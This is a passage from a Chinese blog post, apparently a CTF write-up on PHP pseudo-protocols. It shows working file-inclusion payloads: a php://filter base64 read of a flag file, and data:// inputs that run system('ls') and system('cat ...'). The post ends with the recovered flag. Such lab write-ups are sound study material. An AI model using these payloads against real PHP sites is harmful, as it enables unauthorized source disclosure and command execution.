</li>
<li><p>2<br>使用fliter<br>?page&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;fl4gisisish3r3.php</p>
<p><img src="/images/image-20240516160049925.png" alt="image-20240516160049925"><br>然后再base64解码</p>
</li>
</ul>
<p><strong>方法二</strong><br>通过data:&#x2F;&#x2F;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?page=data://text/plain/,&lt;?php system(&quot;ls&quot;)?&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?page=data://text/plain/,&lt;?php system(&quot;cat fl4gisisish3r3.php&quot;)?&gt;</span><br></pre></td></tr></table></figure>

<p>之后查看源码就可以了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?php</span><br><span class="line">$flag=&quot;ctf&#123;876a5fca-96c6-4cbd-9075-46f0c89475d2&#125;&quot;;</span><br><span class="line">?</span><br></pre></td></tr></table></figure>


      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2024/07/02/chenge-first-blog/" data-id="cly4g10ea00000kugeyqp164x" data-title="php伪协议" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/07/">July 2024</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2024/07/02/chenge-first-blog/">php伪协议</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2024 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>